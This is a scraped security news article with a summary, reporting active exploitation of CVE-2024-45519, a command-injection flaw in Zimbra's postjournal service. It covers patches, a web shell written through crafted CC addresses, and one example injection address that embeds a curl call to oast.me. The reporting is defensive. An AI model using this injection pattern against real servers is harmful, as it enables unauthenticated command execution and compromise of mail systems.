Article Details

Scrape Timestamp (UTC): 2024-10-02 06:08:27.773

Source: https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html

Original Article Text

Click to Toggle View

Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw. Cybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration. Enterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to execute arbitrary commands on affected Zimbra installations. "The emails spoofing Gmail were sent to bogus addresses in the CC fields in an attempt for Zimbra servers to parse and execute them as commands," Proofpoint said in a series of posts on X. "The addresses contained Base64 strings that are executed with the sh utility." The critical issue was addressed by Zimbra in versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1 released on September 4, 2024. A security researcher named lebr0nli (Alan Li) has been credited with discovering and reporting the shortcomings. "While the postjournal feature may be optional or not enabled on most systems, it is still necessary to apply the provided patch to prevent potential exploitation," Ashish Kataria, a security architect engineer at Synacor, noted in a comment on September 19, 2024. "For Zimbra systems where the postjournal feature is not enabled and the patch cannot be applied immediately, removing the postjournal binary could be considered as a temporary measure until the patch can be applied." Proofpoint said it identified a series of CC'd addresses, that when decoded, attempt to write a web shell on a vulnerable Zimbra server at the location: "/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp." The installed web shell subsequently listens for inbound connection with a pre-determined JSESSIONID Cookie field, and if present, it proceeds to parse the JACTION cookie for Base64 commands. The web shell comes equipped with support for command execution via exec. Alternatively, it can also download and execute a file over a socket connection. The attacks have not been attributed to a known threat actor or group as of the time of this writing. That said, exploitation activity appears to have commenced a day after Project Discovery released technical details of the flaw, which said it "stems from unsanitized user input being passed to popen in the unpatched version, enabling attackers to inject arbitrary commands." The cybersecurity company the problem is rooted in the manner the C-based postjournal binary handles and parses recipient email addresses in a function called "msg_handler()," thereby allowing command injection on the service running on port 10027 when passing a specially crafted SMTP message with a bogus address (e.g., "aabbb$(curl${IFS}oast.me)"@mail.domain.com). In light of active exploitation attempts, users are strongly recommended to apply the latest patches for optimum protection against potential threats.

Daily Brief Summary

MALWARE // Active Exploitation of Critical Security Flaw in Zimbra Servers

Cybersecurity researchers from Proofpoint have reported active attacks targeting a critical flaw in Zimbra Collaboration by Synacor, noted as CVE-2024-45519.

The vulnerability allows unauthenticated attackers to execute arbitrary commands through unsanitized input in Zimbra's postjournal service.

Attackers are sending specially crafted emails with Base64 encoded strings in CC fields, which execute commands if processed by vulnerable servers.

Patches for the vulnerability have been released in multiple Zimbra versions as of early September 2024, following its discovery by researcher Alan Li.

For systems where the patch cannot be quickly applied, removing the postjournal binary is recommended as a temporary safety measure.

Attackers deploy web shells on compromised servers, enabling them to execute commands remotely and potentially download further malicious payloads.

No specific threat actor has been linked to these attacks, although exploitation began shortly after the technical details were made public by Project Discovery.